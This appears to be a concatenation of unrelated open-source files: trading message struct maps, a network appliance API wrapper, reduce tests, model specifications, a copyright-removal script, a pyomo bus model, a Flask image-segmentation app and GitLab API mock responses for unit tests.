        'TotalVolume': 'd',
        'LowIndex': 'd',
        'TurnOver': 'd',
    },
    'LFL2OrderField': {
        'InstrumentID': 'c31',
        'OrderTime': 'c9',
        'OrderKind': 'c2',
        'Price': 'd',
        'ExchangeID': 'c9',
        'Volume': 'd',
    },
    'LFQryPositionField': {
        'InstrumentID': 'c31',
        'InvestorID': 'c19',
        'ExchangeID': 'c9',
        'BrokerID': 'c11',
    },
    'LFInputOrderField': {
        'InstrumentID': 'c31',
        'ContingentCondition': lf.LfContingentConditionTypeMap,
        'ExchangeID': 'c9',
        'MinVolume': 'i',
        'OffsetFlag': lf.LfOffsetFlagTypeMap,
        'OrderPriceType': lf.LfOrderPriceTypeTypeMap,
        'BusinessUnit': 'c21',
        'HedgeFlag': lf.LfHedgeFlagTypeMap,
        'IsAutoSuspend': 'i',
        'ForceCloseReason': lf.LfForceCloseReasonTypeMap,
        'UserID': 'c16',
        'Direction': lf.LfDirectionTypeMap,
        'LimitPrice': 'd',
        'OrderRef': 'c21',
        'Volume': 'i',
        'InvestorID': 'c19',
        'VolumeCondition': lf.LfVolumeConditionTypeMap,
        'TimeCondition': lf.LfTimeConditionTypeMap,
        'BrokerID': 'c11',
        'MiscInfo': 'c30',
        'StopPrice': 'd',
    },
    'LFRtnOrderField': {
        'InstrumentID': 'c31',
        'ExchangeID': 'c11',
        'ParticipantID': 'c11',
        'OrderPriceType': lf.LfOrderPriceTypeTypeMap,
        'BusinessUnit': 'c21',
        'HedgeFlag': lf.LfHedgeFlagTypeMap,
        'VolumeTotalOriginal': 'i',
        'RequestID': 'i',
        'UserID': 'c16',
        'Direction': lf.LfDirectionTypeMap,
        'LimitPrice': 'd',
        'OrderRef': 'c21',
        'InvestorID': 'c19',
        'VolumeCondition': lf.LfVolumeConditionTypeMap,
        'TimeCondition': lf.LfTimeConditionTypeMap,
        'BrokerID': 'c11',
        'OrderStatus': lf.LfOrderStatusTypeMap,
        'VolumeTraded': 'i',
        'VolumeTotal': 'i',
        'OffsetFlag': lf.LfOffsetFlagTypeMap,
    },
    'LFQryAccountField': {
        'InvestorID': 'c19',
        'BrokerID': 'c11',
    },
    'LFMarketDataField': {
        'HighestPrice': 'd',
        'BidPrice5': 'd',
        'BidPrice4': 'd',
        'BidPrice1': 'd',
        'BidPrice3': 'd',
        'BidPrice2': 'd',
        'LowerLimitPrice': 'd',
        'OpenPrice': 'd',
        'AskPrice5': 'd',
        'AskPrice4': 'd',
        'AskPrice3': 'd',
        'PreClosePrice': 'd',
        'AskPrice1': 'd',
        'PreSettlementPrice': 'd',
        'AskVolume1': 'i',
        'UpdateTime': 'c13',
        'UpdateMillisec': 'i',
        'BidVolume5': 'i',
        'BidVolume4': 'i',
        'BidVolume3': 'i',
        'BidVolume2': 'i',
        'PreOpenInterest': 'd',
        'AskPrice2': 'd',
        'Volume': 'i',
        'AskVolume3': 'i',
        'AskVolume2': 'i',
        'AskVolume5': 'i',
        'AskVolume4': 'i',
        'UpperLimitPrice': 'd',
        'BidVolume1': 'i',
        'InstrumentID': 'c31',
        'ClosePrice': 'd',
        'ExchangeID': 'c9',
        'TradingDay': 'c13',
        'PreDelta': 'd',
        'OpenInterest': 'd',
        'CurrDelta': 'd',
        'Turnover': 'd',
        'LastPrice': 'd',
        'SettlementPrice': 'd',
        'ExchangeInstID': 'c64',
        'LowestPrice': 'd',
    },
    'LFRspPositionField': {
        'InstrumentID': 'c31',
        'PosiDirection': lf.LfPosiDirectionTypeMap,
        'HedgeFlag': lf.LfHedgeFlagTypeMap,
        'YdPosition': 'i',
        'InvestorID': 'c19',
        'PositionCost': 'd',
        'BrokerID': 'c11',
        'Position': 'i',
    },
    'LFBarMarketDataField': {
        'InstrumentID': 'c31',
        'Volume': 'd',
        'StartVolume': 'd',
        'EndUpdateMillisec': 'i',
        'High': 'd',
        'TradingDay': 'c9',
        'LowerLimitPrice': 'd',
        'Low': 'd',
        'UpperLimitPrice': 'd',
        'Close': 'd',
        'EndUpdateTime': 'c13',
        'StartUpdateTime': 'c13',
        'Open': 'd',
        'StartUpdateMillisec': 'i',
    },
    'LFL2TradeField': {
        'InstrumentID': 'c31',
        'ExchangeID': 'c9',
        'OrderKind': 'c2',
        'OrderBSFlag': 'c2',
        'Price': 'd',
        'Volume': 'd',
        'TradeTime': 'c9',
    },
    'LFOrderActionField': {
        'InstrumentID': 'c31',
        'ExchangeID': 'c11',
        'ActionFlag': 'c',
        'KfOrderID': 'i',
        'UserID': 'c16',
        'LimitPrice': 'd',
        'OrderRef': 'c21',
        'InvestorID': 'c19',
        'VolumeChange': 'i',
        'BrokerID': 'c11',
        'RequestID': 'i',
        'OrderSysID': 'c31',
    },
}
# Message-type id -> struct class, used to decode incoming frames.
MsgType2LFStruct = {
    lf.MsgTypes.MD: LFMarketDataField,
    lf.MsgTypes.L2_MD: LFL2MarketDataField,
    lf.MsgTypes.L2_INDEX: LFL2IndexField,
    lf.MsgTypes.L2_ORDER: LFL2OrderField,
    lf.MsgTypes.L2_TRADE: LFL2TradeField,
    lf.MsgTypes.BAR_MD: LFBarMarketDataField,
    lf.MsgTypes.QRY_POS: LFQryPositionField,
    lf.MsgTypes.RSP_POS: LFRspPositionField,
    lf.MsgTypes.ORDER: LFInputOrderField,
    lf.MsgTypes.RTN_ORDER: LFRtnOrderField,
    lf.MsgTypes.RTN_TRADE: LFRtnTradeField,
    lf.MsgTypes.ORDER_ACTION: LFOrderActionField,
    lf.MsgTypes.QRY_ACCOUNT: LFQryAccountField,
    lf.MsgTypes.RSP_ACCOUNT: LFRspAccountField,
}
# Merge in the sniffer-specific message types declared in
# longfist_structs_sniffer.
MsgType2LFStruct.update(SnifferMsgType2Struct)
# Reverse mapping: struct class -> message-type id, used when encoding.
LFStruct2MsgType = {
    LFMarketDataField: lf.MsgTypes.MD,
    LFL2MarketDataField: lf.MsgTypes.L2_MD,
    LFL2IndexField: lf.MsgTypes.L2_INDEX,
    LFL2OrderField: lf.MsgTypes.L2_ORDER,
    LFL2TradeField: lf.MsgTypes.L2_TRADE,
    LFBarMarketDataField: lf.MsgTypes.BAR_MD,
    LFQryPositionField: lf.MsgTypes.QRY_POS,
    LFRspPositionField: lf.MsgTypes.RSP_POS,
    LFInputOrderField: lf.MsgTypes.ORDER,
    LFRtnOrderField: lf.MsgTypes.RTN_ORDER,
    LFRtnTradeField: lf.MsgTypes.RTN_TRADE,
    LFOrderActionField: lf.MsgTypes.ORDER_ACTION,
    LFQryAccountField: lf.MsgTypes.QRY_ACCOUNT,
    LFRspAccountField: lf.MsgTypes.RSP_ACCOUNT,
}
| 1.914063 | 2 |
pyedgeconnect/orch/_link_integrity.py | SPOpenSource/edgeconnect-python | 15 | 12761003 | <reponame>SPOpenSource/edgeconnect-python
# MIT License
# (C) Copyright 2021 Hewlett Packard Enterprise Development LP.
#
# linkIntegrity : Link integrity and bandwidth test
def get_link_integrity_test_result(
    self,
    ne_id: str,
) -> dict:
    """Get the status and results of the link integrity test currently
    associated with the given appliance.

    .. list-table::
        :header-rows: 1

        * - Swagger Section
          - Method
          - Endpoint
        * - linkIntegrity
          - GET
          - /linkIntegrityTest/status/{neId}

    :param ne_id: Appliance id in the format of integer.NE e.g. ``3.NE``
    :type ne_id: str
    :return: Returns dictionary of test status and related results
    :rtype: dict
    """
    endpoint = "/linkIntegrityTest/status/{}".format(ne_id)
    return self._get(endpoint)
def update_user_defined_app_port_protocol(
    self,
    ne_pk_1: str,
    bandwidth_1: str,
    path_1: str,
    ne_pk_2: str,
    bandwidth_2: str,
    path_2: str,
    duration: int,
    test_program: str,
    dscp: str = "any",
) -> bool:
    """Start a link integrity test between two appliances using
    specified parameters

    .. note::
        NOTE(review): the function name looks like a copy/paste slip --
        this call starts a link integrity test
        (``POST /linkIntegrityTest/run``) and is unrelated to user-defined
        application ports/protocols. Renaming it would break existing
        callers, so the mismatch is only flagged here.

    .. list-table::
        :header-rows: 1

        * - Swagger Section
          - Method
          - Endpoint
        * - linkIntegrity
          - POST
          - /linkIntegrityTest/run

    :param ne_pk_1: Network Primary Key (nePk) of first appliance
    :type ne_pk_1: str
    :param bandwidth_1: Data transfer rate to use from first appliance
    :type bandwidth_1: str
    :param path_1: Traffic path for first appliance. Can have values of
        "pass-through", "pass-through-unshaped" or "{tunnelID}"
        e.g. "tunnel_1".
    :type path_1: str
    :param ne_pk_2: Network Primary Key (nePk) of second appliance
    :type ne_pk_2: str
    :param bandwidth_2: Data transfer rate to use from second appliance
    :type bandwidth_2: str
    :param path_2: Traffic path for first appliance. Can have values of
        "pass-through", "pass-through-unshaped" or "{tunnelID}"
        e.g. "tunnel_1".
    :type path_2: str
    :param duration: Duration of test in seconds
    :type duration: int
    :param test_program: Test program to be used for this test. Can have
        values of "iperf" or "tcpperf"
    :type test_program: str
    :param dscp: DSCP value for test traffic, defaults to "any"
    :type dscp: str, optional
    :return: Returns True/False based on successful call
    :rtype: bool
    """
    # Each side of the test sends at its own rate over its own path
    # (pass-through or a specific tunnel id).
    data = {
        "appA": {"nePk": ne_pk_1, "bandwidth": bandwidth_1, "path": path_1},
        "appB": {"nePk": ne_pk_2, "bandwidth": bandwidth_2, "path": path_2},
        "duration": duration,
        "testProgram": test_program,
        "DSCP": dscp,
    }
    return self._post("/linkIntegrityTest/run", data=data, return_type="bool")
| 2.421875 | 2 |
compss/programming_model/bindings/python/src/pycompss/tests/functions/test_reduce.py | eflows4hpc/compss | 31 | 12761004 | <gh_stars>10-100
#!/usr/bin/python
#
# Copyright 2002-2021 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
def test_merge_reduce():
    """merge_reduce over 0..10 with a binary addition must yield 55."""
    from pycompss.functions.reduce import merge_reduce

    def add(left, right):
        return left + right

    values = list(range(11))
    total = merge_reduce(add, values)
    assert total == 55, "ERROR: Got unexpected result with merge_reduce."
def test_merge_n_reduce():
    """merge_n_reduce over 0..10 with arity-5 summation must yield 55."""
    from pycompss.functions.reduce import merge_n_reduce

    def add_all(*values):
        return sum(values)

    numbers = list(range(11))
    outcome = merge_n_reduce(add_all, 5, numbers)
    assert outcome == 55, "ERROR: Got unexpected result with merge_n_reduce."
| 2.671875 | 3 |
src/Models.py | wengzehang/deformable_rigid_interaction_prediction | 9 | 12761005 | from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, \
GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction
# Define a model specification which can be instantiated
def specify_input_graph_format() -> GraphAttributeFormat:
    """Attribute layout of the graphs fed into the network."""
    layout = {
        "node_format": NodeFormat.XYZR_FixedFlag,
        "edge_format": EdgeFormat.DiffXYZ_ConnectionFlag,
        "global_format": GlobalFormat.NextEndEffectorXYZR,
    }
    return GraphAttributeFormat(**layout)
def specify_position_output_graph_format() -> GraphAttributeFormat:
    """Attribute layout of graphs that carry predicted node positions."""
    layout = {
        "node_format": NodeFormat.XYZ,
        "edge_format": EdgeFormat.DiffXYZ,
        "global_format": GlobalFormat.Dummy,
    }
    return GraphAttributeFormat(**layout)
def specify_has_moved_output_graph_format() -> GraphAttributeFormat:
    """Attribute layout of graphs that carry per-node has-moved classes."""
    layout = {
        "node_format": NodeFormat.HasMovedClasses,
        "edge_format": EdgeFormat.Dummy,
        "global_format": GlobalFormat.Dummy,
    }
    return GraphAttributeFormat(**layout)
def specify_cloth_keypoints_for_bag() -> ClothKeypoints:
    """Hand-picked mesh vertex indices, their connectivity and the fixed
    (grasped) vertices describing the keypoint skeleton of the bag cloth.
    """
    return ClothKeypoints(
        keypoint_indices=[
            # Front
            4, 127, 351, 380, 395, 557, 535, 550, 756, 783, 818, 1258,
            # Back
            150, 67, 420, 436, 920, 952, 1069, 1147, 1125, 1099, 929, 464,
            # Left
            142, 851, 1178,
            # Right
            49, 509, 1000,
            # Bottom
            641
        ],
        keypoint_edges=[
            # Front edges
            (4, 351), (4, 1258),
            (351, 380), (351, 818),
            (380, 395), (380, 783),
            (395, 756),
            (127, 557), (127, 1258),
            (557, 818), (557, 535),
            (535, 783), (535, 550),
            (550, 756),
            (783, 818),
            (818, 1258),
            # Back edges
            (436, 1069), (436, 420),
            (1069, 952),
            (952, 920),
            (420, 1099), (420, 464),
            (1099, 920), (1099, 1125),
            (920, 929),
            (464, 1125), (464, 67),
            (1125, 929), (1125, 1147),
            (67, 1147),
            (150, 1147), (150, 929),
            # Left edges
            (920, 1178),
            (1178, 535), (1178, 851),
            (150, 142),
            (851, 557), (851, 142), (851, 929),
            (142, 127),
            # Right edges
            (509, 380), (509, 420), (509, 1000),
            (1000, 351), (1000, 464), (1000, 49),
            (49, 4), (49, 67),
            # Bottom edges
            (641, 127), (641, 4),
            (641, 67), (641, 150),
        ],
        # Vertices held by the end effector; presumably they do not move
        # freely during simulation -- confirm against the dataset generator.
        fixed_keypoint_indices=[395, 550, 756, 436, 952, 1069]
    )
def specify_graph_net_structure() -> GraphNetStructure:
    """Layer sizes and number of message-passing steps of the graph network."""
    encoder_layers = dict(
        encoder_node_layers=[64, 64],
        encoder_edge_layers=[64, 64],
        encoder_global_layers=[128],
    )
    core_layers = dict(
        core_node_layers=[128, 64],
        core_edge_layers=[128, 64],
        core_global_layers=[128],
    )
    return GraphNetStructure(num_processing_steps=5, **encoder_layers, **core_layers)
def specify_training_params() -> TrainingParams:
    """Training hyper-parameters shared by all model variants."""
    params = {
        "frame_step": 1,
        "movement_threshold": 0.001,
        "batch_size": 32,
    }
    return TrainingParams(**params)
def specify_motion_model(name: str) -> ModelSpecification:
    """Build the specification of the position-regression ("motion") model."""
    spec_kwargs = {
        "name": name,
        "input_graph_format": specify_input_graph_format(),
        "output_graph_format": specify_position_output_graph_format(),
        "position_frame": PositionFrame.LocalToEndEffector,
        "graph_net_structure": specify_graph_net_structure(),
        "loss_function": LossFunction.MeanSquaredError_Position_NodesOnly,
        "cloth_keypoints": specify_cloth_keypoints_for_bag(),
        "training_params": specify_training_params(),
    }
    return ModelSpecification(**spec_kwargs)
def specify_has_moved_model(name: str) -> ModelSpecification:
    """Build the specification of the has-moved classification model."""
    spec_kwargs = {
        "name": name,
        "input_graph_format": specify_input_graph_format(),
        "output_graph_format": specify_has_moved_output_graph_format(),
        "position_frame": PositionFrame.LocalToEndEffector,
        "graph_net_structure": specify_graph_net_structure(),
        "loss_function": LossFunction.CrossEntropy,
        "cloth_keypoints": specify_cloth_keypoints_for_bag(),
        "training_params": specify_training_params(),
    }
    return ModelSpecification(**spec_kwargs)
| 2.3125 | 2 |
copyright_updater/erase.py | swasun/copyright-updater | 0 | 12761006 | #####################################################################################
# MIT License #
# #
# Copyright (C) 2018 <NAME> #
# #
# This file is part of copyright-updater. #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
#####################################################################################
from .console_logger import ConsoleLogger
from .copyright import Copyright
from .comment_parameters import CommentParameters
from .comment import comment_copyright
from .find import find_copyright, is_copyright_exist
from shutil import copyfile
import os
def erase_copyright(target_file_name, with_backup):
    """Remove the detected copyright header from *target_file_name* in place.

    Parameters
    ----------
    target_file_name: str
        Path of the file to strip.
    with_backup: bool
        When True, a copy of the original file is saved as
        '<target_file_name>.backup' before the file is rewritten.

    Returns
    -------
    bool
        Always True; files without a detectable copyright are skipped.
    """
    # Read the file once and derive both the line view (for detection)
    # and the raw content (for rewriting) from it.
    with open(target_file_name, 'r') as target_file:
        target_content = target_file.read()
    file_lines = target_content.splitlines(keepends=True)

    try:
        copyright_block = find_copyright(file_lines)
    except Exception:
        # find_copyright signals "not found" by raising; anything else here
        # is also treated as "nothing to erase" rather than a hard failure.
        ConsoleLogger.status('No copyright detected in ' + target_file_name + ' - skipping.')
        return True

    if with_backup:
        copyfile(target_file_name, target_file_name + '.backup')

    copyright_content = ''.join(copyright_block.lines)
    # Prefer removing the header together with trailing blank lines,
    # falling back to progressively looser matches.
    new_content = target_content.replace(copyright_content + '\n' + '\n', '')
    new_content = new_content.replace(copyright_content + '\n', '')
    new_content = new_content.replace(copyright_content, '')

    # open(..., 'w') truncates, so no separate os.remove() is needed.
    with open(target_file_name, 'w') as new_file:
        new_file.write(new_content)

    ConsoleLogger.success('Copyright erased in ' + target_file_name)
    return True
economic_dispatch/model/bus.py | simcesplatform/economic-dispatch | 0 | 12761007 | # -*- coding: utf-8 -*-
# Copyright 2021 Tampere University and VTT Technical Research Centre of Finland
# This software was developed as a part of the ProCemPlus project: https://www.senecc.fi/projects/procemplus
# This source code is licensed under the MIT license. See LICENSE in the repository root directory.
# Author(s): <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
"""
Contains class for Bus.
"""
import pyomo.environ as pyo
from economic_dispatch.model.units.base import _Unit
from economic_dispatch.model.factory import UnitFactory
def _get_index(name, from_list):
    """Return the index of the first element of *from_list* whose ``name``
    attribute equals *name*, or None when no element matches."""
    matching = (idx for idx, element in enumerate(from_list) if element.name == name)
    return next(matching, None)
class Bus:
    """
    Bus containing all units related to this bus

    ...

    Attributes
    ----------
    name: str
        name of the bus
    units: dict
        key: unit name, value: unit object
    unit_names: list
        list of unit names

    Methods
    -------
    block_rule(block: pyo.Block)
        Builds all the optimisation model components for this unit type
        on top of the passed block.
    topics(prefix: bool=True)
        returns a list of network's units' problem instance parameter names,
        if prefix=True '{unit.name}.' is added before attribute names.
    add(unit: _Unit)
        add unit to bus
    remove(name: str)
        remove unit from bus
    """

    def __init__(self, name, units=None):
        """
        Parameters
        ----------
        name: str
            name of the bus
        units: List
            list of all unit objects related to this bus
        """
        # None default avoids sharing one mutable list between instances.
        if units is None:
            units = []
        self.name = name
        self._units = units

    def __repr__(self):
        return self.__class__.__name__ + '(units=' + str(list(self.unit_names)) + ')'

    def add(self, unit):
        """ Adds unit to bus. Raises ValueError if it is not a _Unit. """
        if isinstance(unit, _Unit):
            self._units.append(unit)
        else:
            raise ValueError("Input unit is not valid")

    def remove(self, name):
        """ Removes unit from bus. Unknown names are silently ignored. """
        if name in self.unit_names:
            self._units.pop(_get_index(name, self._units))

    def topics(self, prefix=True):
        """ Return a list of bus's units' problem instance parameter names.
        If prefix=True '{unit.name}.' is added before attribute names.
        """
        return [t for u in self._units for t in u.topics(prefix=prefix)]

    @property
    def units(self):
        """ Dictionary with unit names as keys and unit objects as values. """
        return {u.name: u for u in self._units}

    @property
    def unit_names(self):
        """ List of unit names. """
        return list(self.units.keys())

    def clear(self):
        """ Sets problem instance parameter values of units to None. """
        for unit in self._units:
            unit.clear()

    def ready(self):
        """ Returns True if all problem instance parameter values are ready for all units. """
        return all(unit.ready() for unit in self._units)

    def block_rule(self, block):
        """
        Builds all the optimisation model components for this bus
        on top of the passed block.

        The underlying model should have its time index set at attr T

        Parameters
        ----------
        block: pyo.Block
            bus level block of the model.
        """
        model = block.model()
        network = block.parent_block()

        # Index set of the units attached to this bus.
        def U_init(b):
            return self.unit_names
        block.U = pyo.Set(initialize=U_init)

        # Block rules to units: each unit builds its own sub-block.
        def unit_rule(b, i):
            self.units[i].block_rule(b)
        block.Units = pyo.Block(block.U, rule=unit_rule)

        # Optimized (controllable) units: those exposing a 'dispatch' attr.
        def controllable_init(b):
            return [u for u in b.U if hasattr(b.Units[u], 'dispatch')]
        block.C = pyo.Set(initialize=controllable_init)

        # Total real power injection to bus.
        # NOTE(review): relies on the parent network block providing
        # icd_matrix, L and Lines[...].power_flow -- defined elsewhere.
        def inj_rule(b, i):
            return sum(network.icd_matrix[self.name, line] * network.Lines[line].power_flow[i]
                       for line in network.L)
        block.net_injection = pyo.Expression(model.T, rule=inj_rule)

        # Dispatches minus electrical loads
        def rp_rule(b, i):
            return sum(b.Units[u].real_power[i] for u in b.U)
        block.real_power = pyo.Expression(model.T, rule=rp_rule)

        # Power balance constraint
        def demand_rule(b, i):
            return b.real_power[i] == b.net_injection[i]
        block.demand_balance = pyo.Constraint(model.T, rule=demand_rule)

        # Operational cost of all units on the bus.
        def op_cost_rule(b, i):
            return sum(b.Units[u].operational_cost[i] for u in b.U)
        block.operational_cost = pyo.Expression(model.T, rule=op_cost_rule)

        # Total cost of all units on the bus.
        def cost_rule(b, i):
            return sum(b.Units[u].cost[i] for u in b.U)
        block.cost = pyo.Expression(model.T, rule=cost_rule)

    @classmethod
    def from_json(cls, json_bus):
        """ Creates a Bus from dictionary and returns it. """
        json_units = json_bus.get("units")
        units = []
        for json_unit in json_units:
            unit = UnitFactory.make_component(**json_unit)
            units.append(unit)
        # NOTE: mutates the input dict (replaces "units" with unit objects).
        json_bus["units"] = units
        bus = Bus(**json_bus)
        return bus
return bus | 2.484375 | 2 |
eha/apps/users/schema/mutations/user_mutations.py | Niyitangasam/e-ha-backend | 0 | 12761008 | <filename>eha/apps/users/schema/mutations/user_mutations.py
import graphene
from eha.users.models import User
from eha.users.schema.types.user_type import UserType
class CreateUser(graphene.Mutation):
    """
    Mutation to create a new user
    """
    # Created user object, populated on success.
    user = graphene.Field(UserType)

    class Arguments:
        username = graphene.String(required=True)
        email = graphene.String(required=True)
        mobile_number = graphene.String(required=True)
        profile_image = graphene.String()
        password = graphene.String(required=True)

    # Human-readable success / error messages returned to the client.
    success = graphene.List(graphene.String)
    errors = graphene.List(graphene.String)

    def mutate(self, info, **kwargs):
        # Delegate creation to the user manager; surface any failure as an
        # "errors" payload instead of raising through the GraphQL layer.
        try:
            user = User.objects.create_user(**kwargs)
            success = ['You have successfully registered']
            return CreateUser(success=success, user=user)
        except Exception as e:
            errors = ["Something went wrong: {}".format(e)]
            return CreateUser(errors=errors)
Flask/app.py | fjzs/Segmentor | 0 | 12761009 | from datetime import datetime
from flask import Flask, request, render_template
from inference import get_category,save_image
# Flask application instance; the route below is registered on it.
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def fragment():
    """Serve the upload form (GET) or segment an uploaded image (POST)."""
    # GET: render the upload form.
    if request.method == 'GET':
        return render_template('index.html')

    # POST: run segmentation on the uploaded file.
    if request.method == 'POST':
        print(request.files)
        if 'file' not in request.files:
            print('File Not Uploaded')
            # Return an explicit 400 response; a bare `return` would hand
            # Flask None and raise a TypeError instead of a clean error page.
            return 'File Not Uploaded', 400

        # Read file from upload and keep a copy of the input.
        file = request.files['file']
        save_image(file, "input")

        # Segment the image with each model; get_category saves its output
        # image into the static folder as a side effect.
        model1 = 'modelDeepLabV3_Mila.tflite'
        model2 = 'lite-model_deeplabv3-xception65_1_default_2.tflite'
        model3 = 'lite-model_mobilenetv2-coco_dr_1.tflite'
        get_category(img=file, model=model1)
        get_category(img=file, model=model2)
        get_category(img=file, model=model3)

        return render_template('result.html', model1=model1, model2=model2, model3=model3)
if __name__ == '__main__':
    # Port 33507 is required so the app runs on Heroku.
    app.run(port=33507, debug=True)
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/source_control/gitlab/gitlab.py | tr3ck3r/linklight | 0 | 12761010 | # -*- coding: utf-8 -*-
# Copyright: (c) 2019, <NAME> (<EMAIL>)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import
import sys
from httmock import response # noqa
from httmock import urlmatch # noqa
from ansible_collections.community.general.tests.unit.compat import unittest
from gitlab import Gitlab
class FakeAnsibleModule(object):
    """Minimal stand-in for AnsibleModule used by the GitLab module tests."""

    def __init__(self):
        # The tests always run with check mode disabled.
        self.check_mode = False

    def fail_json(self, **args):
        """No-op replacement for AnsibleModule.fail_json."""
        pass

    def exit_json(self, **args):
        """No-op replacement for AnsibleModule.exit_json."""
        pass
class GitlabModuleTestCase(unittest.TestCase):
    # Base class for GitLab module unit tests: skips on unsupported Python
    # versions, and provides a fake AnsibleModule plus a Gitlab client
    # pointed at a mocked localhost endpoint.
    def setUp(self):
        unitest_python_version_check_requirement(self)
        self.mock_module = FakeAnsibleModule()
        self.gitlab_instance = Gitlab("http://localhost", private_token="private_token", api_version=4)
# Python 2.7+ is needed for python-gitlab
GITLAB_MINIMUM_PYTHON_VERSION = (2, 7)


def python_version_match_requirement():
    """Return True when the running interpreter satisfies python-gitlab's
    minimum supported version."""
    current = sys.version_info
    return current >= GITLAB_MINIMUM_PYTHON_VERSION
# Skip unittest test case if python version don't match requirement
def unitest_python_version_check_requirement(unittest_testcase):
    """Skip *unittest_testcase* when the interpreter is too old for python-gitlab."""
    if python_version_match_requirement():
        return
    unittest_testcase.skipTest("Python %s+ is needed for python-gitlab" % ",".join(map(str, GITLAB_MINIMUM_PYTHON_VERSION)))
'''
USER API
'''


# Mock for GET /api/v4/users (user search / listing).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users", method="get")
def resp_find_user(url, request):
    headers = {'content-type': 'application/json'}
    content = ('[{"id": 1, "username": "john_smith", "name": "<NAME>", "state": "active",'
               '"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
               '"web_url": "http://localhost:3000/john_smith"}, {"id": 2,'
               '"username": "jack_smith", "name": "<NAME>", "state": "blocked",'
               '"avatar_url": "http://gravatar.com/../e32131cd8.jpeg",'
               '"web_url": "http://localhost:3000/jack_smith"}]')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


# Mock for POST /api/v4/users (user creation, returns 201).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users", method="post")
def resp_create_user(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{"id": 1, "username": "john_smith", "name": "<NAME>", "state": "active",'
               '"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
               '"web_url": "http://localhost:3000/john_smith","created_at": "2012-05-23T08:00:58Z",'
               '"bio": null, "location": null, "public_email": "<EMAIL>", "skype": "",'
               '"linkedin": "", "twitter": "", "website_url": "", "organization": ""}')
    content = content.encode("utf-8")
    return response(201, content, headers, None, 5, request)


# Mock for GET /api/v4/users/1 (existing user).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="get")
def resp_get_user(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{"id": 1, "username": "john_smith", "name": "<NAME>",'
               '"state": "active",'
               '"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
               '"web_url": "http://localhost:3000/john_smith",'
               '"created_at": "2012-05-23T08:00:58Z", "bio": null, "location": null,'
               '"public_email": "<EMAIL>", "skype": "", "linkedin": "",'
               '"twitter": "", "website_url": "", "organization": "", "is_admin": false}')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


# Mock for GET /api/v4/users/1 (missing user, returns 404).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="get")
def resp_get_missing_user(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{}')
    content = content.encode("utf-8")
    return response(404, content, headers, None, 5, request)


# Mock for DELETE /api/v4/users/1 (successful delete, returns 204).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="delete")
def resp_delete_user(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{}')
    content = content.encode("utf-8")
    return response(204, content, headers, None, 5, request)


# Mock for DELETE /api/v4/users/1 (missing user, returns 404).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="delete")
def resp_delete_missing_user(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{}')
    content = content.encode("utf-8")
    return response(404, content, headers, None, 5, request)
'''
USER SSHKEY API
'''


# Mock for GET /api/v4/users/1/keys (list SSH keys of user 1).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1/keys", method="get")
def resp_get_user_keys(url, request):
    headers = {'content-type': 'application/json'}
    content = ('[{"id": 1, "title": "Public key",'
               '"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596'
               'k6YjzGGphH2TUxwKzxcKDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQa'
               'SeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
               '"created_at": "2014-08-01T14:47:39.080Z"},{"id": 3,'
               '"title": "Another Public key",'
               '"key": "ssh-rsa <KEY>'
               '<KEY>'
               'eP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
               '"created_at": "2014-08-01T14:47:39.080Z"}]')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


